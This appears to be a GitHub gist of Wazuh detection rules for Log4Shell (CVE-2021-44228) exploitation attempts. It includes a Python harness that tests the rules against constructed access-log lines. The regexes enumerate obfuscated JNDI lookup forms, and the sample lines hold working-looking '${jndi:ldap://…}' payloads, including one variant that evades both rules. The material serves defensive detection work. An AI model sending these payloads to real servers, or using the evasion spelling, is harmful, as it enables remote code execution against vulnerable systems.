@apertureless
Last active December 16, 2021 11:13
Log4j Wazuh
<group name="web,">
  <!-- Both rules are children (if_sid) of the web access-log rules and only fire
       after one of those parents has matched; level 8 produces an alert. -->
  <rule id="100134" level="8">
    <if_sid>31108, 31100</if_sid>
    <!-- Wazuh OS_Regex syntax, not PCRE: "\$" is a literal dollar sign, "{" and ":"
         are plain characters and "|" separates alternatives. Each alternative is a
         plain JNDI lookup prefix (ldap, rmi, ldaps, dns, iiop, http, nis, nds, corba)
         or one of the generic lookups (${::-i}, ${lower:, ${upper:$) used to hide one. -->
    <regex>\${jndi:ldap:|\${jndi:rmi:|\${jndi:ldaps:|\${jndi:dns:|\${jndi:iiop:|\${jndi:http:|\${jndi:nis:|\${jndi:nds:|\${jndi:corba:|\${::-i}|\${lower:|\${upper:\$</regex>
    <description>Log4Shell - Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228</description>
  </rule>
  <rule id="100135" level="8">
    <if_sid>31108, 31100, 31120</if_sid>
    <!-- Obfuscated forms: a URL-encoded brace (%7B, "\S" = any non-space character)
         and double/triple encodings, a nested ${lower:} inside ${jndi:}, the ${::-x}
         default-value trick, an ${env:} default, ${base64:} (JHtqbmRp is "${jndi"
         base64-encoded) and every upper/lower case-mapping spelling of j, n, d, i. -->
    <regex>\S%7Bjndi\S|\$%7Bjndi\S|%2524%257Bjndi|%2F%252524%25257Bjndi%3A|\${jndi:\${lower:|\${::-j}\${|\${\${env:BARFOO:-j}|\${::-l}\${::-d}\${::-a}\${::-p}|\${base64:JHtqbmRp|\${\${upper:j}\${upper:n}\${upper:d}\${upper:i}|\${\${upper:j}\${upper:n}\${upper:d}\${lower:i}|\${\${upper:j}\${upper:n}\${lower:d}\${upper:i}|\${\${upper:j}\${upper:n}\${lower:d}\${lower:i}|\${\${upper:j}\${lower:n}\${upper:d}\${upper:i}|\${\${upper:j}\${lower:n}\${upper:d}\${lower:i}|\${\${upper:j}\${lower:n}\${lower:d}\${upper:i}|\${\${upper:j}\${lower:n}\${lower:d}\${lower:i}|\${\${lower:j}\${upper:n}\${upper:d}\${upper:i}|\${\${lower:j}\${upper:n}\${upper:d}\${lower:i}|\${\${lower:j}\${upper:n}\${lower:d}\${upper:i}|\${\${lower:j}\${upper:n}\${lower:d}\${lower:i}|\${\${lower:j}\${lower:n}\${upper:d}\${upper:i}|\${\${lower:j}\${lower:n}\${upper:d}\${lower:i}|\${\${lower:j}\${lower:n}\${lower:d}\${upper:i}|\${\${lower:j}\${lower:n}\${lower:d}\${lower:i}</regex>
    <description>Log4Shell - Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228</description>
  </rule>
</group>
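To see what the two rules actually catch, here is an added example (not part of the gist, and not Wazuh's own matcher) that runs their <regex> bodies over a few constructed access-log lines. Wazuh's OS_Regex is not PCRE, so the script first translates the small subset of OS_Regex syntax these rules use (\$ as a literal dollar, \S as any non-space character, | for alternation) into a Python pattern; that translation is an approximation good enough for these rules, and the if_sid chaining (the parent web-log rule must match first) is not modelled. The log lines, IP addresses and the final evasion string are all constructed for the example; the last line uses the same ${::-x} default-value trick the rules enumerate, but in a spelling neither alternative list contains, which is the main caveat of indicator-list detection.

```python
import re

# Regex bodies copied verbatim from rules 100134 and 100135 above.
RULES = {
    "100134": r"\${jndi:ldap:|\${jndi:rmi:|\${jndi:ldaps:|\${jndi:dns:|\${jndi:iiop:|\${jndi:http:|\${jndi:nis:|\${jndi:nds:|\${jndi:corba:|\${::-i}|\${lower:|\${upper:\$",
    "100135": r"\S%7Bjndi\S|\$%7Bjndi\S|%2524%257Bjndi|%2F%252524%25257Bjndi%3A|\${jndi:\${lower:|\${::-j}\${|\${\${env:BARFOO:-j}|\${::-l}\${::-d}\${::-a}\${::-p}|\${base64:JHtqbmRp|\${\${upper:j}\${upper:n}\${upper:d}\${upper:i}|\${\${upper:j}\${upper:n}\${upper:d}\${lower:i}|\${\${upper:j}\${upper:n}\${lower:d}\${upper:i}|\${\${upper:j}\${upper:n}\${lower:d}\${lower:i}|\${\${upper:j}\${lower:n}\${upper:d}\${upper:i}|\${\${upper:j}\${lower:n}\${upper:d}\${lower:i}|\${\${upper:j}\${lower:n}\${lower:d}\${upper:i}|\${\${upper:j}\${lower:n}\${lower:d}\${lower:i}|\${\${lower:j}\${upper:n}\${upper:d}\${upper:i}|\${\${lower:j}\${upper:n}\${upper:d}\${lower:i}|\${\${lower:j}\${upper:n}\${lower:d}\${upper:i}|\${\${lower:j}\${upper:n}\${lower:d}\${lower:i}|\${\${lower:j}\${lower:n}\${upper:d}\${upper:i}|\${\${lower:j}\${lower:n}\${upper:d}\${lower:i}|\${\${lower:j}\${lower:n}\${lower:d}\${upper:i}|\${\${lower:j}\${lower:n}\${lower:d}\${lower:i}",
}


def os_regex_to_python(pattern):
    """Translate the OS_Regex subset used above into an equivalent Python pattern.

    OS_Regex (Wazuh's own matcher) is not PCRE: "\\$" is a literal dollar sign,
    braces and colons are plain characters, "\\." is a wildcard and "\\S" is any
    non-space character. Only those constructs plus "|", "+", "*" and the "^"/"$"
    anchors are handled; this is an approximation for testing, not a port.
    """
    out = []
    i, n = 0, len(pattern)
    while i < n:
        c = pattern[i]
        if c == "\\" and i + 1 < n:
            esc = pattern[i + 1]
            i += 2
            if esc == ".":
                out.append(".")                  # \. = any character
            elif esc in "sSwWdDt":
                out.append("\\" + esc)           # close enough to Python's classes
            else:
                out.append(re.escape(esc))       # \$ \( \) \| \\ are literals
        elif c == "|" or c in "+*":
            out.append(c)
            i += 1
        elif (c == "^" and i == 0) or (c == "$" and i == n - 1):
            out.append(c)                        # anchors only at the ends
            i += 1
        else:
            out.append(re.escape(c))             # everything else is literal
            i += 1
    return "".join(out)


COMPILED = {rid: re.compile(os_regex_to_python(rx)) for rid, rx in RULES.items()}


def matching_rules(log_line):
    """Return the rule IDs whose <regex> matches the line.

    In Wazuh these rules additionally require one of their <if_sid> parents
    (the web access-log rules) to have matched first; not modelled here.
    """
    return [rid for rid, rx in COMPILED.items() if rx.search(log_line)]


# Constructed sample lines (Apache combined format); not real traffic.
_PFX = '203.0.113.7 - - [10/Dec/2021:13:17:02 +0000] '
SAMPLE_LOGS = {
    # plain lookup in the User-Agent field: caught by 100134
    "plain": _PFX + '"GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    # URL-encoded in the query string: only 100135 knows about %7B
    "urlencoded": _PFX + '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%3A1389%2Fa%7D HTTP/1.1" 200 612 "-" "curl/7.79.1"',
    # case-mapping obfuscation: 100134 via ${lower:, 100135 via the enumerated spelling
    "case_obfuscated": _PFX + '"GET / HTTP/1.1" 200 612 "-" "${${lower:j}${upper:n}${lower:d}${lower:i}:${lower:l}dap://198.51.100.9:1389/a}"',
    # ordinary request: must not fire
    "benign": _PFX + '"GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    # ${::-x} default-value trick in a spelling neither list enumerates: missed by both
    "evasion": _PFX + '"GET / HTTP/1.1" 200 612 "-" "${${::-j}n${::-d}i:ldap://198.51.100.9:1389/a}"',
}


if __name__ == "__main__":
    for name, line in SAMPLE_LOGS.items():
        print(f"{name:16s} -> {matching_rules(line) or 'no match'}")
```

Run it as-is and compare against wazuh-logtest on the same lines to see how far the translation agrees with the real matcher; the "evasion" line is the one to keep in mind when deciding whether to add a broader alternative (for example any `${::-` at all) to rule 100134 at the cost of more false positives.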
@apertureless (Author)

Added updated rule

<rule id="100135" level="8">
  <if_sid>31108, 31100, 31120</if_sid>
  <regex>\S%7Bjndi\S|\$%7Bjndi\S|%2524%257Bjndi|%2F%252524%25257Bjndi%3A|\${jndi:\${lower:|\${::-j}\${|\${\${env:BARFOO:-j}|\${::-l}\${::-d}\${::-a}\${::-p}|\${base64:JHtqbmRp|\${\${upper:j}\${upper:n}\${upper:d}\${upper:i}|\${\${upper:j}\${upper:n}\${upper:d}\${lower:i}|\${\${upper:j}\${upper:n}\${lower:d}\${upper:i}|\${\${upper:j}\${upper:n}\${lower:d}\${lower:i}|\${\${upper:j}\${lower:n}\${upper:d}\${upper:i}|\${\${upper:j}\${lower:n}\${upper:d}\${lower:i}|\${\${upper:j}\${lower:n}\${lower:d}\${upper:i}|\${\${upper:j}\${lower:n}\${lower:d}\${lower:i}|\${\${lower:j}\${upper:n}\${upper:d}\${upper:i}|\${\${lower:j}\${upper:n}\${upper:d}\${lower:i}|\${\${lower:j}\${upper:n}\${lower:d}\${upper:i}|\${\${lower:j}\${upper:n}\${lower:d}\${lower:i}|\${\${lower:j}\${lower:n}\${upper:d}\${upper:i}|\${\${lower:j}\${lower:n}\${upper:d}\${lower:i}|\${\${lower:j}\${lower:n}\${lower:d}\${upper:i}|\${\${lower:j}\${lower:n}\${lower:d}\${lower:i}</regex>
  <description>Log4Shell - Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228</description>
</rule>

From Bruno Olivera in the Wazuh Slack channel.